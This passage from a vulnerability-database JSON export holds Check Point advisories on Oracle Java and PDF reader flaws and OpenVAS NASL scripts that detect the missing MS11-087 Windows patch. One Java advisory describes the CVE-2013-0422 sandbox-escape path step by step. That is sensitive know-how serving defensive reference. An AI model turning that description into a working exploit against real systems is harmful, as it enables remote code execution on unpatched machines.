["CVE-2012-0507", "CVE-2012-1723", "CVE-2013-0422", "CVE-2013-0431", "CVE-2013-1493"], "modified": "2017-03-01T00:00:00", "id": "CPAI-2013-3486", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T12:12:44", "description": "A code execution vulnerability has been reported in Oracle Java. The vulnerability is due to an access control failure in the com.sun.jmx.mbeanserver package and in the invokeWithArguments() method of the java.lang.invoke.MethodHandle class. A remote attacker could trigger this vulnerability by using the public getMBeanInstantiator method in the JmxMBeanServer class to obtain a reference to a private MBeanInstantiator object then retrieving arbitrary Class references using the findClass method and using the Reflection API with recursion in a way that bypasses a security check by the java.lang.invoke.MethodHandles.Lookup.checkSecurityManager method due to the inability of the sun.reflect.Reflection.getCallerClass method to skip frames related to the new reflection API. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {}, "published": "2014-01-07T00:00:00", "type": "checkpoint_advisories", "title": "Oracle Java MBeanInstantiator.findClass Remote Code Execution - Ver2 (CVE-2013-0422)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0422"], "modified": "2014-01-07T00:00:00", "id": "CPAI-2014-0023", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T06:51:36", "description": "A code execution vulnerability has been reported in Oracle Java. The vulnerability is due to an access control failure in the com.sun.jmx.mbeanserver package and in the invokeWithArguments() method of the java.lang.invoke.MethodHandle class. A remote attacker could trigger this vulnerability by using the public getMBeanInstantiator method in the JmxMBeanServer class to obtain a reference to a private MBeanInstantiator object then retrieving arbitrary Class references using the findClass method and using the Reflection API with recursion in a way that bypasses a security check by the java.lang.invoke.MethodHandles.Lookup.checkSecurityManager method due to the inability of the sun.reflect.Reflection.getCallerClass method to skip frames related to the new reflection API. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {}, "published": "2014-02-03T00:00:00", "type": "checkpoint_advisories", "title": "Oracle Java MBeanInstantiator.findClass Remote Code Execution - Ver2 (CVE-2013-0422)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-0422"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2014-0833", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-17T12:13:44", "description": "Two vulnerabilities have been reported in Oracle Java that can be used to breach the security sandbox. The first vulnerability is due to an access control failure in the com.sun.jmx.mbeanserver package. The second vulnerability is due to an access control failure in the invokeWithArguments() method of the java.lang.invoke.MethodHandle class.", "cvss3": {}, "published": "2013-01-13T00:00:00", "type": "checkpoint_advisories", "title": "Oracle Java JmxMBeanServer Package Sandbox Breach (CVE-2013-0422)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0422"], "modified": "2016-08-17T00:00:00", "id": "CPAI-2013-007", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T07:03:27", "description": "A remote code execution vulnerability exists in Oracle Java.", "cvss3": {}, "published": "2013-05-05T00:00:00", "type": "checkpoint_advisories", "title": "Oracle Java Final Field Overwrite (CVE-2013-2423)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-2423"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2013-1714", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-17T12:15:55", "description": "An unknown vulnerability has been reported in Java Runtime Environment. The vulnerability is due to unknown vectors related to HotSpot. A remote attacker can exploit this issue by enticing a target user to view a specially crafted web page.", "cvss3": {}, "published": "2013-04-28T00:00:00", "type": "checkpoint_advisories", "title": "Java Applet Reflection Type Confusion Remote Code Execution (CVE-2013-2423)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2423"], "modified": "2013-11-07T00:00:00", "id": "CPAI-2013-1685", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-17T12:16:06", "description": "A stack buffer overflow vulnerability has been reported in Oracle Java Runtime. The vulnerability is due to insufficient validation of the 'count' property of the 'curveType' object in the CMM module of the Oracle JVM. A remote attacker can exploit this vulnerability by enticing a target user to open a malicious Java applet with a vulnerable application. Successful exploitation can lead to arbitrary code execution on a target system.", "cvss3": {}, "published": "2013-03-10T00:00:00", "type": "checkpoint_advisories", "title": "Oracle Java Runtime CMM Code Execution (CVE-2013-1493)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1493"], "modified": "2013-10-21T00:00:00", "id": "CPAI-2013-1345", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:50:24", "description": "New exploits were released for several remote code execution vulnerabilities that were discovered in the way Adobe Acrobat Reader and Foxit Reader handle specially crafted PDF files. Although various security products provide coverage against many malformed PDF files vulnerabilities, these new exploits could potentially bypass security products by using PDF files that contain obfuscated JavaScript code.", "cvss3": {}, "published": "2015-02-24T00:00:00", "type": "checkpoint_advisories", "title": "PDF Containing Obfuscated JavaScript Code (CVE-2010-0188; CVE-2010-2883)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0188", "CVE-2010-2883"], "modified": "2015-04-29T00:00:00", "id": "CPAI-2015-0221", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-04-07T16:39:04", "description": "The host is installed with Microsoft Windows operating system and is prone to\n pivilege escalation vulnerability.\n\n This VT has been replaced by OID:1.3.6.1.4.1.25623.1.0.902767.", "cvss3": {}, "published": "2011-11-07T00:00:00", "type": "openvas", "title": "Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3402"], "modified": "2020-04-02T00:00:00", "id": "OPENVAS:1361412562310802500", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802500", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802500\");\n script_version(\"2020-04-02T11:36:28+0000\");\n script_cve_id(\"CVE-2011-3402\");\n script_bugtraq_id(50462);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-02 11:36:28 +0000 (Thu, 02 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-11-07 16:44:35 +0530 (Mon, 07 Nov 2011)\");\n script_name(\"Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Windows\");\n\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2639658\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2011/2639658\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to execute arbitrary code with\n kernel-level privileges. Failed exploit attempts may result in a denial-of-service condition.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 Service Pack 1 and prior\n\n - Microsoft Windows XP Service Pack 3 and prior\n\n - Microsoft Windows Vista Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 Service Pack 2 and prior\n\n - Microsoft Windows server 2003 Service Pack 2 and prior\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to due to an error within the Win32k kernel-mode\n driver when parsing TrueType fonts.\");\n\n script_tag(name:\"solution\", value:\"Apply the workaround.\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Microsoft Windows operating system and is prone to\n pivilege escalation vulnerability.\n\n This VT has been replaced by OID:1.3.6.1.4.1.25623.1.0.902767.\");\n\n script_tag(name:\"solution_type\", value:\"Workaround\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\nexit(66); ## This NVT is deprecated as addressed in secpod_ms11-087.nasl\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-02-09T11:14:13", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS11-087.", "cvss3": {}, "published": "2011-12-14T00:00:00", "type": "openvas", "title": "Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2567053)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3402"], "modified": "2018-02-08T00:00:00", "id": "OPENVAS:902767", "href": "http://plugins.openvas.org/nasl.php?oid=902767", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms11-087.nasl 8724 2018-02-08 15:02:56Z cfischer $\n#\n# Windows Kernel-Mode Drivers Remote Code Execution Vulnerability (2639417)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow local attackers to run arbitrary code in\n kernel mode and take complete control of an affected system. An attacker\n could then install programs view, change, or delete data or create new\n accounts with full administrative rights.\n\n Impact Level: System\";\ntag_affected = \"Microsoft Windows 7 Service Pack 1 and prior\n\n Microsoft Windows XP Service Pack 3 and prior\n\n Microsoft Windows 2003 Service Pack 2 and prior\n\n Microsoft Windows Vista Service Pack 2 and prior\n\n Microsoft Windows Server 2008 Service Pack 2 and prior\";\ntag_insight = \"The flaw is due to to an error within the Win32k kernel-mode driver\n (win32k.sys) when parsing TrueType fonts.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n\n http://technet.microsoft.com/en-us/security/bulletin/ms11-087\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS11-087.\";\n\nif(description)\n{\n script_id(902767);\n script_version(\"$Revision: 8724 $\");\n script_cve_id(\"CVE-2011-3402\");\n script_bugtraq_id(50462);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-08 16:02:56 +0100 (Thu, 08 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-12-14 09:28:44 +0530 (Wed, 14 Dec 2011)\");\n script_name(\"Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2567053)\");\n script_xref(name : \"URL\" , value : \"https://secunia.com/advisories/46724/\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2639417\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/ms11-087\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Check for OS and Service Pack\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:2) <= 0){\n exit(0);\n}\n\n## MS11-087 Hotfix (2639417)\nif(hotfix_missing(name:\"2639417\") == 0){\n exit(0);\n}\n\n## Get System Path\nsysPath = smb_get_systemroot();\nif(!sysPath){\n exit(0);\n}\n\n## Get Version from Win32k.sys file\nsysVer = fetch_file_version(sysPath, file_name:\"system32\\Win32k.sys\");\nif(!sysVer){\n exit(0);\n}\n\n## Windows XP\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 3\" >< SP)\n {\n ## Check for Win32k.sys version before 5.1.2600.6178\n if(version_is_less(version:sysVer, test_version:\"5.1.2600.6178\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Windows 2003\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n ## Check for Win32k.sys version before 5.2.3790.4938\n if(version_is_less(version:sysVer, test_version:\"5.2.3790.4938\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## File Information is not available for Windows Vista and Server 2008\n## Applied the patch and taking upgraded version as non vuln\n## Checking for only GDR\n\n## Windows Vista and Windows Server 2008\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n\n if(!SP) {\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n ## Check for Win32k.sys version\n if(version_in_range(version:sysVer, test_version:\"6.0.6002.18000\", test_version2:\"6.0.6002.18543\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Windows 7\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n ## Check for Win32k.sys version\n if(version_is_less(version:sysVer, test_version:\"6.1.7600.16920\") ||\n version_in_range(version:sysVer, test_version:\"6.1.7600.20000\", test_version2:\"6.1.7600.21096\")||\n version_in_range(version:sysVer, test_version:\"6.1.7601.17000\", test_version2:\"6.1.7601.17729\")||\n version_in_range(version:sysVer, test_version:\"6.1.7601.21000\", test_version2:\"6.1.7601.21865\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-08T14:04:57", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS11-087.", "cvss3": {}, "published": "2011-12-14T00:00:00", "type": "openvas", "title": "Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2567053)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3402"], "modified": "2020-01-07T00:00:00", "id": "OPENVAS:1361412562310902767", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902767", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Windows Kernel-Mode Drivers Remote Code Execution Vulnerability (2639417)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902767\");\n script_version(\"2020-01-07T09:06:32+0000\");\n script_cve_id(\"CVE-2011-3402\");\n script_bugtraq_id(50462);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-07 09:06:32 +0000 (Tue, 07 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-12-14 09:28:44 +0530 (Wed, 14 Dec 2011)\");\n script_name(\"Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2567053)\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2639417\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-087\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow local attackers to run arbitrary code in\n kernel mode and take complete control of an affected system. An attacker\n could then install programs view, change, or delete data or create new\n accounts with full administrative rights.\");\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 Service Pack 1 and prior\n\n - Microsoft Windows XP Service Pack 3 and prior\n\n - Microsoft Windows 2003 Service Pack 2 and prior\n\n - Microsoft Windows Vista Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 Service Pack 2 and prior\");\n script_tag(name:\"insight\", value:\"The flaw is due to an error within the Win32k kernel-mode driver\n (win32k.sys) when parsing TrueType fonts.\");\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS11-087.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:2) <= 0){\n exit(0);\n}\n\n## MS11-087 Hotfix (2639417)\nif(hotfix_missing(name:\"2639417\") == 0){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath){\n exit(0);\n}\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Win32k.sys\");\nif(!sysVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 3\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"5.1.2600.6178\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"5.2.3790.4938\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\n## File Information is not available for Windows Vista and Server 2008\n## Applied the patch and taking upgraded version as non vuln\n\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n\n if(!SP) {\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n if(version_in_range(version:sysVer, test_version:\"6.0.6002.18000\", test_version2:\"6.0.6002.18543\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.7600.16920\") ||\n version_in_range(version:sysVer, test_version:\"6.1.7600.20000\", test_version2:\"6.1.7600.21096\")||\n version_in_range(version:sysVer, test_version:\"6.1.7601.17000\", test_version2:\"6.1.7601.17729\")||\n version_in_range(version:sysVer, test_version:\"6.1.7601.21000\", test_version2:\"6.1.7601.21865\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:13:41", "description": "The host is installed with Microsoft Windows operating system and is prone to\n pivilege escalation vulnerability.\n\n This NVT has been replaced by NVT secpod_ms11-087.nasl\n (OID:1.3.6.1.4.1.25623.1.0.902767).", "cvss3": {}, "published": "2011-11-07T00:00:00", "type": "openvas", "title": "Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3402"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:802500", "href": "http://plugins.openvas.org/nasl.php?oid=802500", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms_truetype_font_privilege_elevation_vuln.nasl 5362 2017-02-20 12:46:39Z cfi $\n#\n# Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow attackers to execute arbitrary code with\n kernel-level privileges. Failed exploit attempts may result in a\n denial-of-service condition.\n Impact Level: System\";\ntag_affected = \"Microsoft Windows 7 Service Pack 1 and prior\n Microsoft Windows XP Service Pack 3 and prior\n Microsoft Windows Vista Service Pack 2 and prior\n Microsoft Windows Server 2008 Service Pack 2 and prior\n Microsoft Windows server 2003 Service Pack 2 and prior\";\ntag_insight = \"The flaw is due to due to an error within the Win32k kernel-mode\n driver when parsing TrueType fonts.\";\ntag_solution = \"Apply the workaround from below link,\n http://support.microsoft.com/kb/2639658\";\ntag_summary = \"The host is installed with Microsoft Windows operating system and is prone to\n pivilege escalation vulnerability.\n\n This NVT has been replaced by NVT secpod_ms11-087.nasl\n (OID:1.3.6.1.4.1.25623.1.0.902767).\";\n\nif(description)\n{\n script_id(802500);\n script_version(\"$Revision: 5362 $\");\n script_tag(name:\"deprecated\", value:TRUE);\n script_cve_id(\"CVE-2011-3402\");\n script_bugtraq_id(50462);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 13:46:39 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-07 16:44:35 +0530 (Mon, 07 Nov 2011)\");\n script_name(\"Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/46724/\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2639658\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/advisory/2639658\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Windows\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\nexit(66); ## This NVT is deprecated as addressed in secpod_ms11-087.nasl\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n exit(0); ## plugin may results to FP\n\n## Check for OS\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:2) <= 0){\n exit(0);\n}\n\n## Get System Path\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\ndllPath = sysPath + \"\\system32\\t2embed.dll\";\n\n## Exit if file does not exist\nif(!dllPath){\n exit(0);\n}\n\nshare = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:dllPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\", string:dllPath);\n\n## Check if file is accessible by checking its size\ndllSize = get_file_size(file:file, share:share);\nif(dllSize != NULL){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:10:35", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS12-034.", "cvss3": {}, "published": "2012-05-14T00:00:00", "type": "openvas", "title": "Microsoft Silverlight Code Execution Vulnerabilities - 2681578 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3402", "CVE-2012-0159"], "modified": "2017-04-12T00:00:00", "id": "OPENVAS:902678", "href": "http://plugins.openvas.org/nasl.php?oid=902678", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms12-034_macosx.nasl 5940 2017-04-12 09:02:05Z teissa $\n#\n# Microsoft Silverlight Code Execution Vulnerabilities - 2681578 (Mac OS X)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or 